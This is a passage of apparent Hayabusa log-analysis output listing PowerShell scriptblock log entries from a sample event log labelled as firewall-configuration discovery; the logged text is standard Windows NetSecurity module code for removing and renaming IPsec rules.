($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.Paramete",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 